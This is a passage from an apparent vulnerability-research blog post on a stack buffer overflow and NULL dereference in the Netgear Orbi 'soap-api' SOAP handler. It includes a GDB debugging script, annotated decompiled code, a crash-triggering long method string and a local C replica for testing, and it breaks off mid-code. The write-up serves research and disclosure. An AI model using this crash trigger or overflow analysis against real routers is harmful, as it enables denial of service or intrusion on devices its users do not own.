<p>At this point I felt pretty confident I was crashing <code class="language-plaintext highlighter-rouge">soap-api</code> from this buffer overflow so I was eager to see whether this bug would be exploitable. The stack traces I was seeing didn’t contain anything that immediately stood out as fishy (0x41s in registers, etc), so I wanted to do some live debugging on the device to validate my theory and poke around in memory. Since I had been unable to build a functional emulation environment where I could run <code class="language-plaintext highlighter-rouge">soap-api</code> , I would have to debug on the baremetal. I used a static GDB for armhf downloaded from here: https://github.com/therealsaumil/static-arm-bins and copied it over to the Orbi.</p>

<p>For each request that accesses SOAP functionality,  <code class="language-plaintext highlighter-rouge">lighttpd</code> forks and (something) eventually executes <code class="language-plaintext highlighter-rouge">soap-api</code> to handle this request. I initially had some trouble getting the debugger to catch when <code class="language-plaintext highlighter-rouge">soap-api</code> was spawned and stay attached while other forks were created in the background, but eventually found a sequence of gdb commands that allowed me to catch <code class="language-plaintext highlighter-rouge">soap-api</code> early and then tell gdb to stay attached.</p>

<p>These were:</p>

<ul>
  <li>create break on <code class="language-plaintext highlighter-rouge">main()</code></li>
  <li><code class="language-plaintext highlighter-rouge">set follow-fork-mode child</code></li>
  <li><code class="language-plaintext highlighter-rouge">continue</code></li>
  <li>after sending a request, <code class="language-plaintext highlighter-rouge">lighttpd</code> forks and gdb attaches to <code class="language-plaintext highlighter-rouge">soap-api</code> and breaks on main()</li>
  <li><code class="language-plaintext highlighter-rouge">set follow-fork-mode parent</code> (to prevent new forks from taking over)</li>
  <li><code class="language-plaintext highlighter-rouge">continue</code></li>
</ul>

<p>This was enough to allow GDB to stay attached to the process up until the SIGSEGV, though there were still other issues that broke backtraces and the lack of debug symbols only made this harder. To avoid having to go through this sequence manually each time, I wrote up a GDB script to set everything up and insert break points on <code class="language-plaintext highlighter-rouge">sscanf()</code> and to catch signal 11. Each time the <code class="language-plaintext highlighter-rouge">sscanf</code> breakpoint is hit we print a backtrace, frame info, registers, and the 10 words from the current stack pointer, and do the same on segfault.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>set width 0
set height 0
set verbose off

set follow-fork-mode child
break main
commands 1
set follow-fork-mode parent
continue
end

break sscanf
commands 2
backtrace full
info frame
info registers
x/10x $sp
continue
end

catch signal 11
commands 3
bt full
i frame
i registers
end

continue
</code></pre></div></div>

<h3 id="lolwut-a-null-dereference">lolwut: a null dereference</h3>

<p>With the debugging setup figured out, I attached GDB to the lighttpd process, passed it the script, and then sent a request to trigger the bug — and then I got this:</p>

<p><img src="/assets/images/orbi-nulldrf.png" alt="nullderef" /></p>

<p>This output seemed to indicate that:</p>

<ul>
  <li>The crash was happening in <code class="language-plaintext highlighter-rouge">strcmp</code> in <code class="language-plaintext highlighter-rouge">libc.so.1</code></li>
  <li>The crash was actually caused by a NULL dereference when the code attempted to access the address stored in register <code class="language-plaintext highlighter-rouge">r0</code> , which is 0 at the time of the crash</li>
</ul>

<h2 id="deep-dive-sendsoapresponse">deep dive: SendSoapResponse()</h2>

<p>At this point, I was pretty confused. The condition for the crash was definitely tied to the length of the SOAP method and there’s <em>definitely</em> a buffer overflow, but that wasn’t what was causing the bug. I tried different payload lengths and values to see if it caused anything <em>other</em> than a null pointer defer but was unsuccessful. This is when I decided it was time to go back to Ghidra and go through the code line-by-line to try to understand what was happening.</p>

<h3 id="how-the-payload-reaches-sendsoapresponse">how the payload reaches SendSoapResponse()</h3>

<p>The SOAP action and method strings are initially parsed from the <code class="language-plaintext highlighter-rouge">SOAPAction</code> HTTP header in <code class="language-plaintext highlighter-rouge">main()</code> and these are passed in as arguments to other functions that use them. By the time execution reaches SendSoapResponse(), the method and action strings have been used to construct the SOAP response body by the calling function <code class="language-plaintext highlighter-rouge">SendSoapRespCode()</code>. The code snippet below shows how the SOAP body string is constructed:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="kt">char</span> <span class="n">resp</span><span class="p">[</span><span class="mi">512</span><span class="p">];</span>
  <span class="kt">char</span> <span class="o">*</span><span class="n">resp_fmt</span> <span class="o">=</span> <span class="s">"&lt;m:%sResponse xmlns:m=</span><span class="se">\"</span><span class="s">urn:NETGEAR-ROUTER:service:%s:1</span><span class="se">\"</span><span class="s">&gt;&lt;/m:%sResponse&gt;</span><span class="se">\r\n</span><span class="s">&lt;ResponseCode&gt;%03d&lt;/ResponseCode&gt;</span><span class="se">\r\n</span><span class="s">"</span><span class="p">;</span>
  <span class="n">snprintf</span><span class="p">(</span><span class="n">resp_b</span><span class="p">,</span> <span class="mi">512</span><span class="p">,</span> <span class="n">resp_fmt</span><span class="p">,</span> <span class="n">SOAP_METHOD</span><span class="p">,</span> <span class="n">SOAP_ACTION</span><span class="p">,</span> <span class="n">SOAP_METHOD</span><span class="p">,</span> <span class="n">response_code</span><span class="p">);</span>
</code></pre></div></div>

<p>Assuming a method “METHOD”, action “ACTION, and response code 404, the resulting string would be:</p>

<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;m:METHODResponse</span> <span class="na">xmlns:m=</span><span class="s">"urn:NETGEAR-ROUTER:service:ACTION:1"</span><span class="nt">&gt;&lt;/m:METHODResponse&gt;</span>
<span class="nt">&lt;ResponseCode&gt;</span>404<span class="nt">&lt;/ResponseCode&gt;</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">snprintf()</code> will read 512 bytes at most, but that can occur in the first format string it inserts if it’s long enough, resulting in no further formatting and the rest of the string being truncated. For example, submitting a method string containing 500 A’s results in the following string:</p>

<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse</span>
</code></pre></div></div>

<h3 id="code-breakdown">code breakdown</h3>

<p>The code block below is the same as the one shown in the screenshot in the “first find” section earlier in this post but with annotations and renamed variables from after having gone through it all and labeled everything.</p>

<p><strong>Ghidra decompiler output:</strong></p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*1*/</span>      <span class="k">if</span> <span class="p">(</span><span class="n">is_soap_login</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="cm">/*2*/</span>        <span class="n">local_jwt_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">cat_file</span><span class="p">(</span><span class="s">"/tmp/jwt_local"</span><span class="p">);</span>
<span class="cm">/*3*/</span>       <span class="n">fprintf</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span>
<span class="cm">/*4*/</span>                <span class="s">"HTTP/1.0 200 OK</span><span class="se">\r\n</span><span class="s">Content-Length: %d</span><span class="se">\r\n</span><span class="s">Content-Type: text/xml; charset=</span><span class="se">\"</span><span class="s">UTF-8</span><span class="se">\"\r\n</span><span class="s">S erver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0</span><span class="se">\r\n</span><span class="s">Set-Cookie: jwt_local=%s</span><span class="se">\r\n\r\n</span><span class="s">"</span>
<span class="cm">/*5*/</span>                <span class="p">,</span><span class="n">total_content_len</span><span class="p">,</span><span class="n">local_jwt_ptr</span><span class="p">);</span>
<span class="cm">/*6*/</span>      <span class="p">}</span>
<span class="cm">/*7*/</span>      <span class="k">else</span> <span class="p">{</span>
<span class="cm">/*8*/</span>        <span class="n">fprintf</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span>
<span class="cm">/*9*/</span>                <span class="s">"HTTP/1.0 200 OK</span><span class="se">\r\n</span><span class="s">Content-Length: %d</span><span class="se">\r\n</span><span class="s">Content-Type: text/xml; charset=</span><span class="se">\"</span><span class="s">UTF-8</span><span class="se">\"\r\n</span><span class="s">S erver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0</span><span class="se">\r\n\r\n</span><span class="s">"</span>
<span class="cm">/*10*/</span>                <span class="p">,</span><span class="n">total_content_len</span><span class="p">);</span>
<span class="cm">/*11*/</span>      <span class="p">}</span>
<span class="cm">/*12*/</span>      <span class="n">soap_log</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span>
<span class="cm">/*13*/</span>               <span class="s">"HTTP/1.0 200 OK</span><span class="se">\r\n</span><span class="s">Content-Length: %d</span><span class="se">\r\n</span><span class="s">Content-Type: text/xml; charset=</span><span class="se">\"</span><span class="s">UTF-8</span><span class="se">\"\r\n</span><span class="s">Se rver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0</span><span class="se">\r\n</span><span class="s">"</span>
<span class="cm">/*14*/</span>               <span class="p">,</span><span class="n">total_content_len</span><span class="p">);</span>
<span class="cm">/*15*/</span>      <span class="n">fputs</span><span class="p">(</span><span class="n">s_</span><span class="o">&lt;?</span><span class="n">xml_version</span><span class="o">=</span><span class="s">"1.0"</span><span class="n">_encoding</span><span class="o">=</span><span class="s">"UT_000bd624,stream);</span><span class="err">
</span><span class="s">/*16*/      fputs(resp,stream);</span><span class="err">
</span><span class="s">/*17*/      fputs(s_&lt;/SOAP-ENV:Body&gt;_&lt;/SOAP-ENV:Enve_000bd6fc,stream);</span><span class="err">
</span><span class="s">/*18*/      soap_log(0,"</span><span class="o">%</span><span class="n">s</span><span class="o">%</span><span class="n">s</span><span class="o">%</span><span class="n">s</span><span class="s">",s_&lt;?xml_version="</span><span class="mi">1</span><span class="p">.</span><span class="mi">0</span><span class="s">"_encoding="</span><span class="n">UT_000bd624</span><span class="p">,</span><span class="n">resp</span><span class="p">,</span>
<span class="cm">/*19*/</span>               <span class="n">s_</span><span class="o">&lt;/</span><span class="n">SOAP</span><span class="o">-</span><span class="n">ENV</span><span class="o">:</span><span class="n">Body</span><span class="o">&gt;</span><span class="n">_</span><span class="o">&lt;/</span><span class="n">SOAP</span><span class="o">-</span><span class="n">ENV</span><span class="o">:</span><span class="n">Enve_000bd6fc</span><span class="p">);</span>
<span class="cm">/*20*/</span>      <span class="n">fflush</span><span class="p">(</span><span class="n">stream</span><span class="p">);</span>

<span class="cm">/*21*/</span>      <span class="k">if</span> <span class="p">((</span><span class="n">ext_mode</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
<span class="cm">/*22*/</span>         <span class="p">(</span><span class="n">total_content_len</span> <span class="o">=</span> <span class="n">config_invmatch</span><span class="p">(</span><span class="s">"installState"</span><span class="p">,</span><span class="o">&amp;</span><span class="n">DAT_0008d1a0</span><span class="p">),</span> <span class="n">total_content_len</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">))</span> <span class="p">{</span>
<span class="cm">/*23*/</span>                        <span class="cm">/* OVERFLOW - method_response_buf is 64 bytes and sscanf does not check length
/*24*/</span>                            <span class="err">*/</span>
<span class="cm">/*25*/</span>        <span class="n">sscanf</span><span class="p">(</span><span class="n">resp</span><span class="p">,</span><span class="s">"&lt;m:%sResponse%*s"</span><span class="p">,</span><span class="n">method_response_buf</span><span class="p">);</span>
<span class="cm">/*26*/</span>        <span class="n">strstr_Response_ret</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">strstr_wrapper</span><span class="p">(</span><span class="n">method_response_buf</span><span class="p">,</span><span class="s">"Response"</span><span class="p">);</span>
<span class="cm">/*27*/</span>        <span class="k">if</span> <span class="p">(</span><span class="n">strstr_Response_ret</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
<span class="cm">/*28*/</span>          <span class="o">*</span><span class="n">strstr_Response_ret</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="cm">/*29*/</span>        <span class="p">}</span>
<span class="cm">/*30*/</span>                        <span class="cm">/* POSSIBLE NULL DEREF, strstr_wrapper might return null */</span>
<span class="cm">/*31*/</span>        <span class="n">ptr_to_substrings_found</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">strstr_wrapper</span><span class="p">(</span><span class="n">resp</span><span class="p">,</span><span class="s">"service:"</span><span class="p">);</span>
<span class="cm">/*32*/</span>        <span class="n">sscanf</span><span class="p">(</span><span class="n">ptr_to_substrings_found</span><span class="p">,</span><span class="s">"service:%[^:]"</span><span class="p">,</span><span class="n">service_action_buf</span><span class="p">);</span>
<span class="cm">/*33*/</span>        <span class="n">ptr_to_substrings_found</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">strstr_wrapper</span><span class="p">(</span><span class="n">resp</span><span class="p">,</span><span class="s">"&lt;ResponseCode&gt;"</span><span class="p">);</span>
<span class="cm">/*34*/</span>        <span class="k">if</span> <span class="p">(</span><span class="n">ptr_to_substrings_found</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
<span class="cm">/*35*/</span>          <span class="n">sscanf</span><span class="p">(</span><span class="n">ptr_to_substrings_found</span><span class="p">,</span><span class="s">"&lt;ResponseCode&gt;%[^&lt;]"</span><span class="p">,</span><span class="o">&amp;</span><span class="n">local_114</span><span class="p">);</span>
<span class="cm">/*36*/</span>        <span class="p">}</span>
<span class="cm">/*37*/</span>        <span class="n">vsnprintf_wrap</span><span class="p">(</span><span class="n">combined_action_method_str</span><span class="p">,</span><span class="mh">0x80</span><span class="p">,</span><span class="s">"%s:%s"</span><span class="p">,</span><span class="n">service_action_buf</span><span class="p">,</span><span class="n">method_response_buf</span><span class="p">);</span>
<span class="cm">/*38*/</span>        <span class="n">execve_wrapper_maybe</span>
<span class="cm">/*39*/</span>                  <span class="p">(</span><span class="s">"/dev/console"</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="s">"/usr/sbin/ra_installevent"</span><span class="p">,</span><span class="s">"soapresponse"</span><span class="p">,</span>
<span class="cm">/*40*/</span>                   <span class="n">combined_action_method_str</span><span class="p">,</span><span class="o">&amp;</span><span class="n">local_114</span><span class="p">,</span><span class="mi">0</span><span class="p">);</span>
<span class="cm">/*41*/</span>        <span class="n">FUN_0001ae0c</span><span class="p">(</span><span class="s">"ra_install"</span><span class="p">,</span><span class="s">"method=%s, code=%s"</span><span class="p">,</span><span class="n">combined_action_method_str</span><span class="p">,</span><span class="o">&amp;</span><span class="n">local_114</span><span class="p">);</span>
<span class="cm">/*42*/</span>      <span class="p">}</span>
</code></pre></div></div>

<ul>
  <li><strong>Arguments:</strong>
    <ul>
      <li><code class="language-plaintext highlighter-rouge">FILE *stream</code>: filestream where response will be written (socket back to client?)</li>
      <li><code class="language-plaintext highlighter-rouge">char *resp</code>: a 512 byte buffer containing the body of the XML SOAP response contructed by the calling function (<code class="language-plaintext highlighter-rouge">DoSoapRespCode</code>)</li>
    </ul>
  </li>
  <li><strong>Lines 1-20</strong> in the snippet handle constructing and send the response content to the client by writing that content to the file stream passed in as the first argument to SendSoapResponse
    <ul>
      <li>note: this is why the response is always sent no matter</li>
    </ul>
  </li>
  <li><strong>Line 25:</strong> a call to <code class="language-plaintext highlighter-rouge">sscanf</code> to attempt to parse the SOAP method string
    <ul>
      <li>other functions up the call stack have parsed and placed the method string into an XML component in the <code class="language-plaintext highlighter-rouge">resp</code> argument passed to <code class="language-plaintext highlighter-rouge">SendSoapResponse</code></li>
      <li><code class="language-plaintext highlighter-rouge">sscanf</code> searches for the pattern <code class="language-plaintext highlighter-rouge">&lt;m:*Response*</code> and will parse the content between the colon up to the end of ‘Response’</li>
      <li><code class="language-plaintext highlighter-rouge">method_response_buf</code> is a static 64 byte buffer</li>
      <li>its possible to overflow this buffer if the string between <code class="language-plaintext highlighter-rouge">&lt;m:</code> and <code class="language-plaintext highlighter-rouge">Response*</code> is greater than 64 bytes, which appears to be possible to do</li>
    </ul>
  </li>
  <li><strong>Line 26:</strong> a call to a <code class="language-plaintext highlighter-rouge">strstr</code> wrapper to check for the presence of the string “<code class="language-plaintext highlighter-rouge">Response</code> ” in the data that was read into <code class="language-plaintext highlighter-rouge">method_response_buf</code> by  <code class="language-plaintext highlighter-rouge">sscanf</code>
    <ul>
      <li>this wrapper first checks to make sure neither of the two arguments passed to it are NULL
        <ul>
          <li>if either of them are, it doesn’t call strstr and just returns a NULL pointer</li>
          <li>if they’re not, it calls <code class="language-plaintext highlighter-rouge">strstr</code> and then returns whatever <code class="language-plaintext highlighter-rouge">strstr</code> returned; <code class="language-plaintext highlighter-rouge">strstr</code> also returns NULL if the string is not found</li>
        </ul>
      </li>
      <li>If the submitted SOAP method has pushed <code class="language-plaintext highlighter-rouge">Response</code> string entirely off of the XML buffer that is constructed, this would return NULL</li>
    </ul>
  </li>
  <li><strong>Line 27-29:</strong> if the call to <code class="language-plaintext highlighter-rouge">strstr</code> did NOT return NULL (the <code class="language-plaintext highlighter-rouge">Response</code> string was found), set the value at the first char of <code class="language-plaintext highlighter-rouge">Response</code> to NULL
    <ul>
      <li>This null terminates the string so that only the SOAP method part is parsed by other funcs that stop reading at NULL and the Response part is truncated</li>
    </ul>
  </li>
  <li><strong>Line 31:</strong> another call to <code class="language-plaintext highlighter-rouge">strstr</code> wrapper, this time checking the <code class="language-plaintext highlighter-rouge">resp</code> argument containing the XML constructed by the calling function for the string  <code class="language-plaintext highlighter-rouge">"service:"</code>
    <ul>
      <li>there is no check after this to see if this returned NULL</li>
    </ul>
  </li>
  <li><strong>Line 32:</strong> second call to <code class="language-plaintext highlighter-rouge">sscanf</code> that attempts to parse the SOAP action string from the pattern <code class="language-plaintext highlighter-rouge">"service:*:"</code> , this time using the value returned by the call to <code class="language-plaintext highlighter-rouge">strstr</code> on the previous line as it’s source
    <ul>
      <li>since this value was not checked for NULL before this call to sscanf, this is likely the path taken to reach the crash condition</li>
      <li>this only happens when the method string was sufficiently long to have pushed <code class="language-plaintext highlighter-rouge">"service:*:"</code> string off of the XML body buffer resp</li>
    </ul>
  </li>
  <li><strong>Line 33:</strong> third call to <code class="language-plaintext highlighter-rouge">strstr</code> wrapper, this time searching for the string <code class="language-plaintext highlighter-rouge">"&lt;ResponseCode&gt;"</code> in <code class="language-plaintext highlighter-rouge">resp</code> otherwise this is skipped</li>
  <li><strong>Line 34</strong>: if the string was found by the call to <code class="language-plaintext highlighter-rouge">strstr</code> in the previous line, <code class="language-plaintext highlighter-rouge">sscanf</code> is used to parse out a substring similar to previous calls; otherwise this is just skipped.</li>
</ul>

<h3 id="takeaways">takeaways</h3>

<p>After going through the code, I knew the following:</p>

<ol>
  <li>It is possible to overflow <code class="language-plaintext highlighter-rouge">method_response_buf</code> that the first call to <code class="language-plaintext highlighter-rouge">sscanf()</code> writes the method string to.</li>
  <li>It is possible to overflow <code class="language-plaintext highlighter-rouge">service_action_buf</code> that the second call to <code class="language-plaintext highlighter-rouge">sscanf()</code> writes the action string to.</li>
  <li>A NULL dereference will occur in the second call to <code class="language-plaintext highlighter-rouge">sscanf</code> if the string <code class="language-plaintext highlighter-rouge">'service:'</code> is not found in <code class="language-plaintext highlighter-rouge">resp</code>.
    <ol>
      <li>This will occur if the method string submitted is long enough to cause the SOAP action portion (<code class="language-plaintext highlighter-rouge">service:</code>) to be truncated from the final response data in <code class="language-plaintext highlighter-rouge">resp</code></li>
    </ol>
  </li>
</ol>

<p>Knowing this, it was clear to see why the payloads I was sending were causing the null dereference: the method strings were sufficiently long to have caused the <code class="language-plaintext highlighter-rouge">'service:'</code> string to be truncated from the end of <code class="language-plaintext highlighter-rouge">resp</code>, causing the <code class="language-plaintext highlighter-rouge">strstr()</code> call which checks for it to return a null pointer that is then passed to <code class="language-plaintext highlighter-rouge">sscanf()</code> without checking if it was null first.</p>

<h2 id="failed-exploit-attempt-1">(failed) exploit attempt #1</h2>

<p>The results of the code analysis indicated that in order to successfully trigger a crash caused by the buffer overflow, the following conditions would need to be met:</p>

<ul>
  <li>the method string needs to be long enough for the overflow to be useful (i.e. overwriting the return address, base pointer, etc.)</li>
  <li>the final contents of <code class="language-plaintext highlighter-rouge">resp</code> must include the string <code class="language-plaintext highlighter-rouge">'service:'</code> ]</li>
</ul>

<p>With this in mind, I went back and spent some time trying payloads I thought would successfully avoid triggering the null defererence but was ultimately unsuccessful. My (incorrect) conclusion was that the conditions necessary to overwrite something important made it impossible to ensure the check for to service string would be passed. I had tried putting it both at the beginning and end of the payload string but this still caused the null deref every time. I had been looking at this bug for a few days at this point and had was pretty exhausted so I just called it at that point and concluded that the even though the buffer overflow was there, it was ‘unreachble’ due to the (incorrect) contstraints I had in mind at the time. Honestly, I was just relieved to be done with it.</p>

<h2 id="exploit-viability-revisited">exploit viability, revisited</h2>

<p>As hinted at above, I did eventually revisit the question of whether the buffer overflow could be triggered a few weeks later and found a way to do it! In fact, it actually happened while I was in the process of writing the first part of this post, where I was basically going to end with section before this one, saying there was no way to get around it. While I was reading through my notes and trying to clean everything up and make sure it all made sense, I noticed I had made some mistakes and incorrect assumptions that had caused me to have an inaccurate understanding of the contstraints. I’ve corrected those mistakes and cleaned things up in the code breakdown above in the interest of clarity but basically I had an incorrect understanding of the constraints and the behavior of <code class="language-plaintext highlighter-rouge">sscanf()</code> . Anyway, I updated my mental model of the bug.</p>

<p>With a new understanding of the constraints , I went back to the code and did some more testing to see if it would be possible to overflow <code class="language-plaintext highlighter-rouge">method_response_buf</code> while avoiding the NULL deference caused by failing the check for <code class="language-plaintext highlighter-rouge">"service:"</code>. Assuming this can be done successfully, the program should then crash due to failing a stack canary check. Stack canary protection (as well as PIE and RELRO) was enabled between firmware versions 2.5.1.16 - 2.7.33.</p>

<p>From the GPL archive (<code class="language-plaintext highlighter-rouge">soap-api</code> is part of the <code class="language-plaintext highlighter-rouge">net-cgi</code> package):</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">.</span><span class="o">/</span><span class="n">package</span><span class="o">/</span><span class="n">dni</span><span class="o">/</span><span class="n">net</span><span class="o">-</span><span class="n">cgi</span><span class="o">/</span><span class="n">Makefile</span><span class="o">:</span><span class="n">TARGET_CFLAGS</span> <span class="o">+=</span> <span class="o">-</span><span class="n">Werror</span> <span class="o">-</span><span class="n">Wl</span><span class="p">,</span><span class="o">-</span><span class="n">z</span><span class="p">,</span><span class="n">now</span> <span class="o">-</span><span class="n">Wl</span><span class="p">,</span><span class="o">-</span><span class="n">z</span><span class="p">,</span><span class="n">relro</span> <span class="o">-</span><span class="n">fPIE</span> <span class="o">-</span><span class="n">pie</span> <span class="o">-</span><span class="n">fstack</span><span class="o">-</span><span class="n">protector</span>
</code></pre></div></div>

<h3 id="local-testing">local testing</h3>

<p>In order to get a better understanding of the actual behavior of the application with a better debugging environment to work in, I wrote the following code to simulate the same behavior on my own system.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">replica</span> <span class="p">(</span><span class="kt">FILE</span> <span class="o">*</span><span class="n">stream</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">resp</span><span class="p">)</span> <span class="p">{</span>
	<span class="c1">// THE ORDER OF VARIABLES IN MEMORY IS IMPORTANT TO REPRODUCE ACCURATELY (or at least close to accurate)</span>
	<span class="kt">int</span> <span class="n">content_len</span><span class="p">;</span>
	<span class="kt">char</span><span class="o">*</span> <span class="n">jwt</span><span class="p">;</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">var2</span><span class="p">;</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">var3</span><span class="p">;</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">var4</span><span class="p">;</span>
	<span class="kt">char</span> <span class="n">method_buf</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
	<span class="kt">char</span> <span class="n">action_buf</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
	<span class="kt">char</span> <span class="n">combined_action_method</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">undef1</span><span class="p">;</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">undef2</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">stack_check_val</span><span class="p">;</span>

	<span class="n">printf</span><span class="p">(</span><span class="s">"resp: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">resp</span><span class="p">);</span>

	<span class="c1">// fake stack canary</span>
	<span class="n">stack_check_val</span> <span class="o">=</span> <span class="mh">0x313373</span><span class="p">;</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] stack check start: 0x%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">stack_check_val</span><span class="p">);</span>

	<span class="c1">// null the buffers</span>
	<span class="n">memset</span><span class="p">(</span><span class="n">method_buf</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">64</span><span class="p">);</span>
	<span class="n">memset</span><span class="p">(</span><span class="n">action_buf</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">32</span><span class="p">);</span>
	<span class="n">memset</span><span class="p">(</span><span class="n">combined_action_method</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">128</span><span class="p">);</span>

	<span class="c1">// call sscanf - 1: parse the Method portion from the xml blob in resp</span>
	<span class="c1">// and save it to method buf (format is '&lt;m:METHODResponse*'). there is a buffer overflow</span>
	<span class="c1">// here if the parsed string is greater than 64 bytes</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] sscanf call 1: parse method portion from resp</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">sscanf</span><span class="p">(</span><span class="n">resp</span><span class="p">,</span> <span class="s">"&lt;m:%sResponse%*s"</span><span class="p">,</span> <span class="n">method_buf</span><span class="p">);</span>

	<span class="c1">// this would check to confirm that the expected pattern/str was parsed (should still</span>
	<span class="c1">// contain the 'Response' portion - a long enough method will cause this to be truncated and we'll</span>
	<span class="c1">// fail this check.</span>
	<span class="n">var2</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">method_buf</span><span class="p">,</span> <span class="s">"Response"</span><span class="p">);</span>
	<span class="c1">// but it doesn't really matter because it's only to see if</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">var2</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"[+] found 'Response' in method_buf, NULLED</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
		<span class="o">*</span><span class="n">var2</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// ========= Second call to sscanf() and NULL check fail ===========</span>
	<span class="c1">// search for service string in resp, no NULL check</span>
	<span class="c1">// a long enough METHOD would result in this being truncated, causing strstr</span>
	<span class="c1">// to return a NULL pointer</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] strstr call 1: check for 'service:' in resp</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">var3</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">strstr</span><span class="p">(</span><span class="n">resp</span><span class="p">,</span> <span class="s">"service:"</span><span class="p">);</span>
	<span class="c1">// DEBUG -- show when we fail this check</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">var3</span> <span class="o">==</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\033</span><span class="s">[0;31m[!] didn't find 'service:', expect a NULL ptr deref</span><span class="se">\n\033</span><span class="s">[0m"</span><span class="p">);</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"resp: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">resp</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] sscanf call 2: parse ACTION portion from resp</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">sscanf</span><span class="p">(</span><span class="n">var3</span><span class="p">,</span> <span class="s">"service:%[^:]"</span><span class="p">,</span> <span class="n">action_buf</span><span class="p">);</span>

	<span class="c1">// check for &lt;ResponseCode&gt; in resp</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] strstr call 2: check for '&lt;ResponseCode&gt;' in resp</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
